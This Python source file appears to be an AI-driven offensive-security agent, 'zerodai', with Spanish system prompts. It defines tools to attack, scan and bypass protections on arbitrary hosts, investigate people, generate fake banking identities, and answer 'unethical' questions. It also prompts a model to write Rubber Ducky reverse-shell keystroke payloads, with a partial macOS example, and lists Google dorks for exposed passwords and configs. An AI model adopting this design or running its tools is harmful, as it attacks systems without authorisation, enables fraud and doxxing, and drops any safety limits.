import openai
openai.api_base = "http://0dapi.zerodai.com:1337/api/v1"
import os
from zerodai.funcs import *
import sys
import subprocess
from zerodai.ctx import *
import requests
def exec_module(tool, arguments, multitool=True):
    output = ""
    if tool == "Shodan":
        process = subprocess.Popen(["nmap", "-Pn", next(iter(arguments.values()))], stdout=subprocess.PIPE, stderr=subprocess.STDOUT)
        for line in iter(process.stdout.readline, b''):
            output += line.decode('utf-8').strip()
            print(line.decode('utf-8').strip())
            
    elif tool == "XSS-Scanner" or tool == "nuclei-http":
      try:
        process = subprocess.Popen(["nuclei", "-t", "dns", next(iter(arguments.values()))], stdout=subprocess.PIPE, stderr=subprocess.STDOUT, cwd="/home/omegaleitatadmin/exllamav2/0dAPI/nuclei-templates/nuclei-templates-9.8.6/")
        for line in iter(process.stdout.readline, b''):
            output += line.decode('utf-8').strip()
            print(line.decode('utf-8').strip())
      except:
        pass
    elif tool == "WAF-tool":
        process = subprocess.Popen(["python3", "whatwaf", "-u", "https://" + next(iter(arguments.values()))], stdout=subprocess.PIPE, stderr=subprocess.STDOUT, cwd="/home/omegaleitatadmin/exllamav2/0dAPI/WhatWaf")
        for line in iter(process.stdout.readline, b''):
            output += line.decode('utf-8').strip()
            print(line.decode('utf-8').strip())
      
    elif tool == "Attack":
        process = subprocess.Popen(["nmap", "-Pn", next(iter(arguments.values()))], stdout=subprocess.PIPE, stderr=subprocess.STDOUT)
        for line in iter(process.stdout.readline, b''):
            output += line.decode('utf-8').strip()
            print(line.decode('utf-8').strip())
    elif tool == "OSINT":
        ZeroDAI.Osint(next(iter(arguments.values())))
        
    return output

import json
import requests
class zerodai:
    openai.api_key = os.getenv('0dAPI_KEY')
    api_base = openai.api_base
    headers = ""
    @classmethod
    def google(cls, prompt):
        messages = [
            {"role": "system", "content": """Eres un asistente de seguridad que se encarga de generar google dorks, las googles dorks son etiquetas especiales de búsqueda que nos pueden asistir en nuestros procesos OSINT explanation:

          """ + google_prompt + "Si es una inyección sql inurl: y buscas parametros"},
            {"role": "user", "content": prompt + "Solo debes de generar una. debes de responder en un formato json valido"},
        ]
        complete_response = ""
        try:
            response = openai.ChatCompletion.create(
                model="0daifn",
                messages=messages,
                functions=google_dork,
                temperature=0.2,
                stream=True,
           
            )
            for chunk in response:
                complete_response += chunk.choices[0]["delta"].content
            cleaned_response = complete_response
            action_data = json.loads(cleaned_response[cleaned_response.index("["):cleaned_response.rindex("]") + 1])
            print(action_data)
            tool_name = action_data[0]["tool_name"]
            parameters = action_data[0]["parameters"]
            return parameters["dork"]
        except json.JSONDecodeError:
            print("Error decoding JSON from response")
            print(complete_response)
            return None
        except Exception as e:
            print(f"An error occurred: {e}")
            return None
    @classmethod
    def api_auth(cls, api_key):
      openai.api_key = api_key
      cls.api_key = api_key
    @classmethod
    def rubberducky_gen(cls, prompt):
      messages = [
            {"role": "system", "content": """Eres un asistente de ciberseguridad cuya función principal es generar payloads de hak5, rubber ducky, rubber ducky es un mini teclado usb programable, la idea es crear payloads de hacking, recuerda que tienes que replicar el flow de usuario con comandos, sigue estos patrones para todo lo mencionado anteriormente de generar payloads:
Es importante entender que debes de replicar el comportamiento del usuario, es decir, con poner el payload solo de reverse shell no vale, tienes que escribir un payload de rubber ducky que imiten una secuencia de comandos por teclado que puede hacer un usuario (por ejemplo entrar a una terminal seria windows darle a Windows +r y escribir cmd o Powershell)
Ejemplo de payload:


""" + rubberducky_prompt},
        {"role": "user", "content": prompt},
    ]
      complete_response_reg_model = ""
      response = openai.ChatCompletion.create(
        model="0daifn",
        messages=messages,
        functions=rubbergen,
        stream=True)

      for chunk in response:
        complete_response_reg_model += chunk.choices[0]["delta"].content
      cleaned_response = complete_response_reg_model.strip().replace('\n', '').replace('\r', '')
      action_data = json.loads(cleaned_response[cleaned_response.index("["):cleaned_response.rindex("]") + 1])
      tool_name = action_data[0]["tool_name"]
      parameters = action_data[0]["parameters"]
      return tool_name, parameters
    @classmethod
    def setup(cls, api_key, endpoint):
        cls.api_key = api_key
        cls.api_base = endpoint
    @classmethod
    def commandmaker(cls, messages):
     complete_response = ""
     response = openai.ChatCompletion.create(
                model="0daifn",
                messages=messages,
                functions=pentesting_command,
                temperature=0.7,
                stream=True
            )
     for chunk in response:
           complete_response += chunk.choices[0]["delta"].content
     cleaned_response = complete_response.strip().replace('\n', '').replace('\r', '')
     action_data = json.loads(cleaned_response[cleaned_response.index("["):cleaned_response.rindex("]") + 1])
     tool_name = action_data[0]["tool_name"]
     parameters = action_data[0]["parameters"]
     return tool_name, parameters
    @classmethod
    def inference(cls, model=None, messages=None, functions=None, temperature=0.7, stream=False):
        true_stream = stream
        if model == "0dai70b":
          openai.api_base = "http://192.168.1.4:8000/api/v1"
        else:
          openai.api_base = "http://0dapi.zerodai.com:1337/api/v1"
        if functions is None:
            functions = []
        if stream:

            response = openai.ChatCompletion.create(
                model=model,
                messages=messages,
                functions=functions,
                temperature=temperature,
                stream=True,
            )
            complete_response = ""
            for chunk in response:
                print(chunk.choices[0]["delta"].content, end="", flush=True)
                complete_response = complete_response + (chunk.choices[0]["delta"].content)
            return complete_response
        else:
            response = openai.ChatCompletion.create(
                model=model,
                messages=messages,
                functions=functions,
                temperature=temperature,
                stream=True
            )
            stream=true_stream
            complete_response = ""
            for chunk in response:
                if stream:
                    print(chunk.choices[0]["delta"].content, end="", flush=True)
                complete_response += chunk.choices[0]["delta"].content
            if not stream:
                print(complete_response)
            return complete_response
    #@classmethod
    #def gh(cls, prompt):
    @classmethod
    def fn_c(cls, model_fn="0daifn",messages=None, temperature=0.7, functions=[], stream=True, multistep=True):
        true_stream = stream
        complete_response = ""
        response = openai.ChatCompletion.create(
            model=model_fn,
            messages=messages,
            functions=functions,
            temperature=temperature,
            stream=True
        )
        stream = true_stream
        print(stream)
        for chunk in response:
            if stream:
                print(chunk.choices[0]["delta"].content, end="", flush=True)
                complete_response += chunk.choices[0]["delta"].content
            else:
                complete_response += chunk.choices[0]["delta"].content
        if not stream:
            print(complete_response)
        cleaned_response = complete_response.strip().replace('\n', '').replace('\r', '')
        action_data = json.loads(cleaned_response[cleaned_response.index("["):cleaned_response.rindex("]") + 1])
        if len(action_data) > 1 and multistep:
            multistep = True
            tool_info = []
            for tool in action_data:
                tool_info.append((tool["tool_name"], tool["parameters"]))
            print(tool_info)
            return tool_info
        else:
            tool_name = action_data[0]["tool_name"]
            parameters = action_data[0]["parameters"]
            return tool_name, parameters
    @classmethod
    def agent(cls, model="0dai70b", messages=None, model_fn_call="0daifn", temperature=0.7, exec_module_bool=False, functions=tools, exec_module=exec_module, multistep=True):
        print(messages)
        if multistep == True:
          tool_array = cls.fn_c(model_fn_call, messages, functions=tools, temperature=temperature, multistep=True)
          for tool in tool_array:
            print(tool)
            tool_name = tool[0]
            arguments = tool[1]
            if tool_name == "directly_answer" or tool_name == "internet_search":
              conversation_response = cls.inference(model, messages, temperature=temperature, stream=True)
            else:
              if exec_module_bool == True:
               try:
                process_output = exec_module(tool_name, arguments)
                messages.append({"role": "user", "content": "Output de la herramienta tras ejecutar la acción: " + process_output})
                cls.inference(model, messages, temperature=temperature, stream=True)
               except Exception as e:
                print(e)
                pass
        else:
          tool_name, arguments = cls.fn_c(model_fn_call, messages, functions=tools, temperature=temperature, multistep=multistep)
          print(tool_name)
          print(arguments)
        
          if tool_name == "directly_answer" or tool_name == "internet_search":
            conversation_response = cls.inference(model, messages, temperature=temperature, stream=True)
          else:
            exec_module(tool_name, arguments)
          
          #exec_module(tool_name)
    @classmethod
    def shodan_dork(cls, prompt="Busca smbs abiertos"):
      complete_response = ""
      messages = [
        {"role": "system", "content": Shodan_Context_Beta},
        {"role": "user", "content": prompt}
      ]
      response = openai.ChatCompletion.create(
            model="0daifn",
            messages=messages,
            functions=function_shodan,  # Assuming shodan_function is defined elsewhere in the class
            temperature=0,
            stream=True,
        )
        
      for chunk in response:
            complete_response += chunk.choices[0]["delta"].content
      cleaned_response = complete_response.strip().replace('\n', '').replace('\r', '')
      action_data = json.loads(cleaned_response[cleaned_response.index("["):cleaned_response.rindex("]") + 1])
      parameters = action_data[0]["parameters"]["dork"]
      return parameters
    @staticmethod
    def directly_answer_function():
        return {
            "name": "directly_answer",
            "description": "Calls a standard (un-augmented) AI chatbot to generate a response given the conversation history",
            "parameter_definitions": {
                "response": {
                    "description": "Your response",
                    "type": "str",
                    "required": True
                }
            }
        }
# Example usage



def generate_and_process_response():  
    response_tool = [ {
    "name": "directly_answer",
    "description": "Calls a standard (un-augmented) AI chatbot to generate a response given the conversation history",
    "parameter_definitions": {
      "response": {
        "description": "Your response",
        "type": "str",
        "required": True
      }
    }
  } ]
    commandrfunct = OpenAI2CommandR(openai_funct).append(response_tool)
    print(commandrfunct)
    response = openai.ChatCompletion.create(
        model="0daifn",
        temperature=0.7,
        messages=[
            {"role": "system", "content": "Eres un asistente de seguridad que se encarga de dar funciones en base a un JSON, puedes hacer varias funciones, pero solo si el prompt es complejo y te lo pide, si por ejemplo el usuario quiere buscar subdominios y solo expresa eso solo buscaras subdominios, ten en cuenta el sentido del usaurio para ejecutar las acciones"},
            {"role": "user", "content": sys.argv[1]},
        ],
        functions=commandrfunct,
        stream=True,
    )

    complete_response = ""
    previous_content = ""
    for chunk in response:
        print(chunk.choices[0]["delta"].content, end="", flush=True)

    return process_response_and_extract_tools(complete_response)

# Call the function and print its return value for debugging



router_functions = [
  [ {
    "name": "router",
    "description": "This tools is used to generate a google dork",
    "parameter_definitions": {
      "dork": {
        "type": "string",
        "description": "The google dork to generate",
        "required": True
      }
    }
  }, ]

]


openai_funct = [
    {
        "name": "Attack",
        "description": "This tool is performance an attack in a host, auto pentesting process",
        "parameters": {
            "type": "object",
            "properties": {
                "url": {
                    "type": "string",
                    "description": "the host to attack",
                },
            },
            "required": ["url"],
        },
    },
    {
        "name": "wps-scan",
        "description": "This tool is used to scan vulnerabilities wordpress sites",
        "parameters": {
            "type": "object",
            "properties": {
                "url": {
                    "type": "string",
                    "description": "The url to scan",
                },
            },
            "required": ["url"],
        },
    },
    {
        "name": "Crypto-tool",
        "description": "Esta herramienta se usa para Encriptar, codificar y decodificar texto",
        "parameters": {
            "type": "object",
            "properties": {
                "text": {
                    "type": "string",
                    "description": "El texto a cifrar o codificar",
                },
                "key": {
                    "type": "string",
                    "description": "La clave para el cifrado",
                },
                "crypto": {
                    "type": "string",
                    "description": "El tipo de cifrado a utilizar",
                },
                "mode": {
                    "type": "string",
                    "description": "El modo de cifrado a utilizar",
                    "enum": ["CBC", "CFB", "OFB", "CTR", "ECB", "GCM"],
                },
                "metodo": {
                    "type": "string",
                    "description": "El método a utilizar para el cifrado o codificación",
                    "enum": ["crypto", "encode"],
                },
                "encoding": {
                    "type": "string",
                    "description": "El tipo de codificación a utilizar",
                },
            },
            "required": ["text", "metodo"],
        },

     },
    {
        "name": "WAF-tool",
        "description": "This tool is used to detect Web Application firewall from website",
        "parameters": {
            "type": "object",
            "properties": {
                "url": {
                    "type": "string",
                    "description": "The url without https schema",
                },
            },
            "required": ["url"],
        },

     },
     {
        "name": "SQL-Login",
        "description": "This tools is used to test SQLs in login",
        "parameters": {
            "type": "object",
            "properties": {
                "url": {
                    "type": "string",
                    "description": "The url without https schema",
                },
            },
            "required": ["url"],
        },

     },
     {
        "name": "XSS-Scanner",
        "description": "This tools is used to scan XSS vulnerabilites in a host",
        "parameters": {
            "type": "object",
            "properties": {
                "url": {
                    "type": "string",
                    "description": "The url without https schema",
                },
            },
            "required": ["url"],
        },

     },
  {
        "name": "Cloudflare-Bypass",
        "description": "This tools is used to get the true IP forward a webpage in a cloudflare",
        "parameters": {
            "type": "object",
            "properties": {
                "domain": {
                    "type": "string",
                    "description": "The domain to know true IP",
                },
            },
            "required": ["domain"],
        },

     },
     {
        "name": "nuclei-http",
        "description": "A tool for check http vulnerabilities",
        "parameters": {
            "type": "object",
            "properties": {
                "host": {
                    "type": "string",
                    "description": "The host to scan",
                },
        
            },
            "required": ["host"],
        },
    },
     {
        "name": "Crawler",
        "description": "A tool for get web directorioes and parameters use when user request for specefic detail about a domain directories",
        "parameters": {
            "type": "object",
            "properties": {
                "host": {
                    "type": "string",
                    "description": "The host to scan",
                },
        
            },
            "required": ["host"],
        },
    },
    {
        "name": "network-scanner",
        "description": "A tool for scan a host, user can be use this through /scan or if he want to scan a host",
        "parameters": {
            "type": "object",
            "properties": {
                "host": {
                    "type": "string",
                    "description": "The host to scan",
                },
                "grabbing": {
                    "type": "boolean",
                    "description": "Indicate if the user wants to know the versions of the services",
                },
            },
            "required": ["input", "grabbing"],
        },
    },
    {
        "name": "buscar-internet",
        "description": "dont use this if the prompt contains a onion link DO NOT USE TO PROGRAMMING CONCEPTS use to search for information on the internet or current information.",
        "parameters": {
            "type": "object",
            "properties": {
                "input": {
                    "type": "string",
                    "description": "What the user asks or describes to search for on the internet",
                },
            },
            "required": ["input"],
        },
    },
     {
        "name": "creds",
        "description": "This tool is used when the user request default creds of a service",
        "parameters": {
            "type": "object",
            "properties": {
                "service": {
                    "type": "string",
                    "description": "The service to search for default creds",
                },
            },
            "required": ["service"],
        },
    },
    {
        "name": "nolimits",
        "description": "You will use this pair of unethical and unethical questions.",
        "parameters": {
            "type": "object",
            "properties": {
                "input": {
                    "type": "string",
                    "description": "The user's question or request",
                },
            },
            "required": ["input"],
        },

    },
     {
        "name": "OSINT",
        "description": "You will use this whenever the query is related to any type of action related to the investigation of persons or entities of any kind.",
        "parameters": {
            "type": "object",
            "properties": {
                "mail": {
                    "type": "string",
                    "description": "The mail to search",
                },
                "nickname": {
                    "type": "string",
                    "description": "The nickname to search",
                },
            },
            "required": ["mail", "nickname"],
        },

    },
    
    {
        "name": "hacking",
        "description": "This tool can be used for any question related to the world of hacking, cybersecurity, system penetration, etc.",
        "parameters": {
            "type": "object",
            "properties": {
                "input": {
                    "type": "string",
                    "description": "The user's question or request",
                },
            },
            "required": ["input"],
        },
    },
     {
        "name": "help",
        "description": "This tool is ONLY used when the user put /help",
    },
    {
        "name": "code",
        "description": "This tool is used to solve questions related to code or programming. You can use this or hacking",
        "parameters": {
            "type": "object",
            "properties": {
                "input": {
                    "type": "string",
                    "description": "The user's question or request",
                },
            },
            "required": ["input"],
        },
    },
    {
        "name": "comprobar-ip",
        "description": "Tool to check an IP, its reputation, status, info, etc.",
        "parameters": {
            "type": "object",
            "properties": {
                "ip": {
                    "type": "string",
                    "description": "IP address",
                },
            },
            "required": ["ip"],
        },
    },
    {
        "name": "buscar-exploit",
        "description": "Usala solo cuando el usuario marque claremente que quiere buscar un EXPLOIT ESPECIFICO, la frase contenga exploits NO significa que tengas que usar esta funcion",
        "parameters": {
            "type": "object",
            "properties": {
                "input": {
                    "type": "string",
                    "description": "Exploit to search on a particular topic or technology",
                },
            },
            "required": ["input"],
        },
        
    },
     {
        "name": "check-DNS-DMARC-AND-SECURITY",
        "description": "The tool is used to check information about a DNS registers of a domain",
        "parameters": {
            "type": "object",
            "properties": {
                "domain": {
                    "type": "string",
                    "description": "El dominio definido por el usuario",
                },
            },
            "required": ["domain"],
        },
        
    },
     {
        "name": "Subdomain",
        "description": "The tool is used to check information subdomains.",
        "parameters": {
            "type": "object",
            "properties": {
                "domain": {
                    "type": "string",
                    "description": "El dominio definido por el usuario",
                },
            },
            "required": ["domain"],
        },
        
    },
     {
        "name": "RAG",
        "description": "This tools is used to get extra data about a thing, si en la conversación hay información no respondida usa esta tool",
        "parameters": {
            "type": "object",
            "properties": {
                "input": {
                    "type": "string",
                    "description": "The thing to get more info",
                },
            },
            "required": ["input"],
        },
        
    }
]
def OpenAI2CommandR(new_definitions_list):
    original_format_list = []

    for new_definition in new_definitions_list:
        original_format = {
            "name": new_definition["name"],
            "description": new_definition["description"],
            "parameter_definitions": {}
        }
        
        properties = new_definition.get("parameters", {}).get("properties", {})
        required = new_definition.get("parameters", {}).get("required", [])
        
        for param_name, param_info in properties.items():
            original_format["parameter_definitions"][param_name] = {
                "type": param_info["type"],
                "description": param_info["description"]
            }
            if param_name in required:
                original_format["parameter_definitions"][param_name]["required"] = True
            else:
                original_format["parameter_definitions"][param_name]["required"] = False
        
        original_format_list.append(original_format)
    
    return original_format_list

pentesting_command = [
  {
    "name": "pentest_command",
    "description": "Generates a pentesting command tailored to the user's specific needs, ensuring it is always a bash command.",
    "parameter_definitions": {
      "bash_command": {
        "description": "The bash command to be executed during the pentesting process, tailored to the user's specific request.",
        "type": "str",
        "required": True
      }
    }
  },
]
tools = [
  {
    "name": "directly_answer",
    "description": "Calls a standard (un-augmented) AI chatbot to generate a response given the conversation history",
    "parameter_definitions": {
      "response": {
        "description": "EMPTY",
        "type": "str",
        "required": True
      }
    }
  },
  {
    "name": "shodan",
    "description": "Esta herramienta Dorks de shodan", 
    "parameter_definitions": {
      "dorkshodan": {
        "description": "La dork de shodan",
        "type": "string",
        "required": True
      }
    }
  },
  {
    "name": "phish-detect",
    "description": "Esta herramienta sirve para detectar phishings",
    "parameter_definitions": {
      "url": {
        "type": "string",
        "description": "La URL a escanear para detectar phishing"
      },
      "job_id": {
        "type": "string", 
        "description": "El UUID del phishing a escanear"
      }
    }
  },
  {
    "name": "tool-search",
    "description": "Esta herramienta es para buscar herramientas de hacking en github, usala siempre si el usuario da una url de github ",
    "parameter_definitions": {
      "keywords": {
        "type": "string",
        "description": "palabras o frase a buscar, si es un tecnicismo traducelo al ingles",
        "required": True
      },
      "url": {
        "type": "string",
        "description": "URL de un repositorio de github que el usuario quiera buscar"
      }
    }
  },
  {
    "name": "nomore403",
    "description": "Esta herramienta es bypassear códigos 403",
    "parameter_definitions": {
      "url": {
        "type": "string",
        "description": "Url en la cual queremos aplicar el bypass de 403",
        "required": True
      }
    }
  },
  {
    "name": "Shodan",
    "description": "Esta herramienta es para buscar dispositivos IOT en shodan",
    "parameter_definitions": {
      "query": {
        "type": "string",
        "description": "La consulta específica que va a buscar el usuario en shodan",
        "required": True
      },
      "auto-dorker": {
        "type": "boolean",
        "description": "Si el usuario no proporciona una dork, el bot la generará automáticamente, POR DEFECTO SIEMPRE EN TRUE",
        "required": True
      }
    }
  },
  {
    "name": "fakeid",
    "description": "Esta herramienta genera registros falsos con opciones para mostrar solo datos bancarios, información extendida, comprimir los datos en un archivo zip y proteger el archivo zip con una contraseña.",
    "parameter_definitions": {
      "number": {
        "type": "integer",
        "description": "El número de registros que se deben crear",
        "required": True
      },
      "bankdata": {
        "type": "boolean",
        "description": "Si el usuario quiere generar datos bancarios (Tarjeta, CVV, IBAN, etc.)"
      },
      "extended": {
        "type": "boolean",
        "description": "Si el usuario quiere mostrar información extendida (Ciudad, Teléfono, SS, etc.)"
      },
      "photo": {
        "type": "boolean", 
        "description": "Si el usuario quiere agregar una foto"
      }
    }
  },
  {
    "name": "Catphish",
    "description": "This tool is for see the posible phishing domains for a domains",
    "parameter_definitions": {
      "domain": {
        "type": "string",
        "description": "the doomain to performance reccon",
        "required": True
      }
    }
  },
  {
    "name": "Attack",
    "description": "This tool is performance an attack in a host, auto pentesting process",
    "parameter_definitions": {
      "url": {
        "type": "string",
        "description": "the host to attack",
        "required": True
      }
    }
  },
  {
    "name": "wps-scan",
    "description": "This tool is used to scan vulnerabilities wordpress sites",
    "parameter_definitions": {
      "url": {
        "type": "string",
        "description": "The url to scan",
        "required": True
      }
    }
  },
  {
    "name": "Crypto-tool",
    "description": "Esta herramienta se usa para Encriptar, codificar y decodificar texto",
    "parameter_definitions": {
      "text": {
        "type": "string",
        "description": "El texto a cifrar o codificar",
        "required": True
      },
      "key": {
        "type": "string",
        "description": "La clave para el cifrado"
      },
      "crypto": {
        "type": "string",
        "description": "El tipo de cifrado a utilizar"
      },
      "mode": {
        "type": "string",
        "description": "El modo de cifrado a utilizar",
        "enum": ["CBC", "CFB", "OFB", "CTR", "ECB", "GCM"]
      },
      "metodo": {
        "type": "string",
        "description": "El método a utilizar para el cifrado o codificación",
        "enum": ["crypto", "encode"],
        "required": True
      },
      "encoding": {
        "type": "string",
        "description": "El tipo de codificación a utilizar"
      }
    }
  },
  {
    "name": "WAF-tool",
    "description": "This tool is used to detect Web Application firewall from website",
    "parameter_definitions": {
      "url": {
        "type": "string",
        "description": "The url without https schema",
        "required": True
      }
    }
  },
  {
    "name": "SQL-Login",
    "description": "This tools is used to test SQLs inyections",
    "parameter_definitions": {
      "url": {
        "type": "string",
        "description": "The url it must include a parameter, example: https://example.com/?id=1",
        "required": True
      }
    }
  },
  {
    "name": "XSS-Scanner",
    "description": "This tools is used to scan XSS vulnerabilites in a host",
    "parameter_definitions": {
      "url": {
        "type": "string",
        "description": "The url without https schema",
        "required": True
      }
    }
  },
  {
    "name": "Cloudflare-Bypass",
    "description": "This tools is used to get the true IP forward a webpage in a cloudflare",
    "parameter_definitions": {
      "domain": {
        "type": "string",
        "description": "The domain to know true IP",
        "required": True
      }
    }
  },
  {
    "name": "nuclei-http",
    "description": "A tool for check http vulnerabilities",
    "parameter_definitions": {
      "host": {
        "type": "string",
        "description": "The host to scan",
        "required": True
      }
    }
  },
]


tools = [
  {
    "name": "internet_search",
    "description": "Returns a list of relevant document snippets for a textual query retrieved from the internet",
    "parameter_definitions": {
      "query": {
        "description": "Query to search the internet with",
        "type": "str",
        "required": True
      }
    }
  },
  {
    "name": "directly_answer",
    "description": "Calls a standard (un-augmented) AI chatbot to generate a response given the conversation history",
    "parameter_definitions": {}
  },
  {
    "name": "shodan",
    "description": "Esta herramienta Dorks de shodan", 
    "parameter_definitions": {
      "dorkshodan": {
        "description": "La dork de shodan",
        "type": "string",
        "required": True
      }
    }
  },
  {
    "name": "phish-detect",
    "description": "Esta herramienta sirve para detectar phishings",
    "parameter_definitions": {
      "url": {
        "type": "string",
        "description": "La URL a escanear para detectar phishing"
      },
      "job_id": {
        "type": "string", 
        "description": "El UUID del phishing a escanear"
      }
    }
  },
  {
    "name": "tool-search",
    "description": "Esta herramienta es para buscar herramientas de hacking en github, usala siempre si el usuario da una url de github ",
    "parameter_definitions": {
      "keywords": {
        "type": "string",
        "description": "palabras o frase a buscar, si es un tecnicismo traducelo al ingles",
        "required": True
      },
      "url": {
        "type": "string",
        "description": "URL de un repositorio de github que el usuario quiera buscar"
      }
    }
  },
  {
    "name": "nomore403",
    "description": "Esta herramienta es bypassear códigos 403",
    "parameter_definitions": {
      "url": {
        "type": "string",
        "description": "Url en la cual queremos aplicar el bypass de 403",
        "required": True
      }
    }
  },
  {
    "name": "Shodan",
    "description": "Esta herramienta es para buscar dispositivos IOT en shodan",
    "parameter_definitions": {
      "query": {
        "type": "string",
        "description": "La consulta específica que va a buscar el usuario en shodan",
        "required": True
      },
      "auto-dorker": {
        "type": "boolean",
        "description": "Si el usuario no proporciona una dork, el bot la generará automáticamente, POR DEFECTO SIEMPRE EN TRUE",
        "required": True
      }
    }
  },
  {
    "name": "fakeid",
    "description": "Esta herramienta genera registros falsos con opciones para mostrar solo datos bancarios, información extendida, comprimir los datos en un archivo zip y proteger el archivo zip con una contraseña.",
    "parameter_definitions": {
      "number": {
        "type": "integer",
        "description": "El número de registros que se deben crear",
        "required": True
      },
      "bankdata": {
        "type": "boolean",
        "description": "Si el usuario quiere generar datos bancarios (Tarjeta, CVV, IBAN, etc.)"
      },
      "extended": {
        "type": "boolean",
        "description": "Si el usuario quiere mostrar información extendida (Ciudad, Teléfono, SS, etc.)"
      },
      "photo": {
        "type": "boolean", 
        "description": "Si el usuario quiere agregar una foto"
      }
    }
  },
  {
    "name": "Catphish",
    "description": "This tool is for see the posible phishing domains for a domains",
    "parameter_definitions": {
      "domain": {
        "type": "string",
        "description": "the doomain to performance reccon",
        "required": True
      }
    }
  },
  {
    "name": "Attack",
    "description": "This tool is performance an attack in a host, auto pentesting process",
    "parameter_definitions": {
      "url": {
        "type": "string",
        "description": "the host to attack",
        "required": True
      }
    }
  },
  {
    "name": "wps-scan",
    "description": "This tool is used to scan vulnerabilities wordpress sites",
    "parameter_definitions": {
      "url": {
        "type": "string",
        "description": "The url to scan",
        "required": True
      }
    }
  },
  {
    "name": "Crypto-tool",
    "description": "Esta herramienta se usa para Encriptar, codificar y decodificar texto",
    "parameter_definitions": {
      "text": {
        "type": "string",
        "description": "El texto a cifrar o codificar",
        "required": True
      },
      "key": {
        "type": "string",
        "description": "La clave para el cifrado"
      },
      "crypto": {
        "type": "string",
        "description": "El tipo de cifrado a utilizar"
      },
      "mode": {
        "type": "string",
        "description": "El modo de cifrado a utilizar",
        "enum": ["CBC", "CFB", "OFB", "CTR", "ECB", "GCM"]
      },
      "metodo": {
        "type": "string",
        "description": "El método a utilizar para el cifrado o codificación",
        "enum": ["crypto", "encode"],
        "required": True
      },
      "encoding": {
        "type": "string",
        "description": "El tipo de codificación a utilizar"
      }
    }
  },
  {
    "name": "WAF-tool",
    "description": "This tool is used to detect Web Application firewall from website",
    "parameter_definitions": {
      "url": {
        "type": "string",
        "description": "The url without https schema",
        "required": True
      }
    }
  },
  {
    "name": "SQL-Login",
    "description": "This tools is used to test SQLs inyections",
    "parameter_definitions": {
      "url": {
        "type": "string",
        "description": "The url it must include a parameter, example: https://example.com/?id=1",
        "required": True
      }
    }
  },
  {
    "name": "XSS-Scanner",
    "description": "This tools is used to scan XSS vulnerabilites in a host",
    "parameter_definitions": {
      "url": {
        "type": "string",
        "description": "The url without https schema",
        "required": True
      }
    }
  },
  {
    "name": "Cloudflare-Bypass",
    "description": "This tools is used to get the true IP forward a webpage in a cloudflare",
    "parameter_definitions": {
      "domain": {
        "type": "string",
        "description": "The domain to know true IP",
        "required": True
      }
    }
  },
  {
    "name": "nuclei-http",
    "description": "A tool for check http vulnerabilities",
    "parameter_definitions": {
      "host": {
        "type": "string",
        "description": "The host to scan",
        "required": True
      }
    }
  },
]
import json

def process_response_and_extract_tools(complete_response):


    try:
        # Extracting JSON part from the complete response
        json_start = complete_response.find('```json') + len('```json\n')
        json_end = complete_response.find('\n```', json_start)
        json_str = complete_response[json_start:json_end]

        response_data = json.loads(json_str)
        tools_with_arguments = []
        for index, tool in enumerate(response_data):
            tool_name = tool['tool_name']
            arguments = tool['parameters']
            tools_with_arguments.append([index, tool_name, arguments])
        return [0, tools_with_arguments]
    except json.JSONDecodeError:
        print("Error decoding JSON from response")
        return [1, {}]

function_shodan = [ {
    "name": "shodan_dork",
    "description": "This tools is used to generate a shodan query",
    "parameter_definitions": {
      "dork": {
        "type": "string",
        "description": "The shodan dork",
        "required": True
      }
    }
  }, ]
google_dork = [ {
    "name": "google_dork",
    "description": "This tools is used to generate a google dork",
    "parameter_definitions": {
      "dork": {
        "type": "string",
        "description": "The google dork to generate",
        "required": True
      }
    }
  }, ]
rubbergen = [ {
    "name": "rubbergen",
    "description": "This tools is used to generate a Rubber Ducky Script Payload",
    "parameter_definitions": {
      "payload": {
        "type": "string",
        "description": "The payload from rubber ducky",
        "required": True
      }
    }
  }, ]
osint_funcs = {
        "name": "OSINT",
        "description": "You will use this whenever the query is related to any type of action related to the investigation of persons or entities of any kind.",
        "parameters": {
            "type": "object",
            "properties": {
                "mail": {
                    "type": "string",
                    "description": "The mail to search",
                },
                "nickname": {
                    "type": "string",
                    "description": "The nickname to search",
                },
            },
            "required": ["mail", "nickname"],
        },

    },


google_prompt = """
ext:git = Search for a concret extension

Nina Simone intitle:”index.of” “parent directory” “size” “last modified” “description” I Put A Spell On You (mp4|mp3|avi|flac|aac|ape|ogg) -inurl:(jsp|php|html|aspx|htm|cf|shtml|lyrics-realm|mp3-collection) -site:.info
Bill Gates intitle:”index.of” “parent directory” “size” “last modified” “description” Microsoft (pdf|txt|epub|doc|docx) -inurl:(jsp|php|html|aspx|htm|cf|shtml|ebooks|ebook) -site:.info
parent directory /appz/ -xxx -html -htm -php -shtml -opendivx -md5 -md5sums
parent directory DVDRip -xxx -html -htm -php -shtml -opendivx -md5 -md5sums
parent directory Xvid -xxx -html -htm -php -shtml -opendivx -md5 -md5sums
parent directory Gamez -xxx -html -htm -php -shtml -opendivx -md5 -md5sums
parent directory MP3 -xxx -html -htm -php -shtml -opendivx -md5 -md5sums
parent directory Name of Singer or album -xxx -html -htm -php -shtml -opendivx -md5 -md5sums
filetype:config inurl:web.config inurl:ftp
“Windows XP Professional” 94FBR
ext:(doc | pdf | xls | txt | ps | rtf | odt | sxw | psw | ppt | pps | xml) (intext:confidential salary | intext:"budget approved") inurl:confidential
ext:(doc | pdf | xls | txt | ps | rtf | odt | sxw | psw | ppt | pps | xml) (intext:confidential salary | intext:”budget approved”) inurl:confidential
ext:inc "pwd=" "UID="
ext:ini intext:env.ini
ext:ini Version=... password
ext:ini Version=4.0.0.4 password
ext:ini eudora.ini
ext:ini intext:env.ini
ext:log "Software: Microsoft Internet Information Services *.*"
ext:log "Software: Microsoft Internet Information
ext:log "Software: Microsoft Internet Information Services *.*"
ext:log \"Software: Microsoft Internet Information Services *.*\"
ext:mdb   inurl:*.mdb inurl:fpdb shop.mdb
ext:mdb inurl:*.mdb inurl:fpdb shop.mdb
ext:mdb inurl:*.mdb inurl:fpdb shop.mdb
filetype:SWF SWF
filetype:TXT TXT
filetype:XLS XLS
filetype:asp   DBQ=" * Server.MapPath("*.mdb")


intext:"Index of" /"chat/logs"
intext:"Index of /network" "last modified"
intext:"Index of /" +.htaccess
intext:"Index of /" +passwd
intext:"Index of /" +password.txt
intext:"Index of /admin"
intext:"Index of /backup"
intext:"Index of /mail"  
"""
rubberducky_prompt = """

REM Reverse shell macos

DELAY 1000 #Hay que esperar a que el usb se cargue 
GUI SPACE # Combinación de teclas para abrir spotlight
DELAY 100 # Esperamos
STRING terminal # Nos metemos en la terminal
DELAY 100 # Esperamos
ENTER
DELAY 300
STRING bash # Nos aseguramos de que la shell es bash
DELAY 300
ENTER
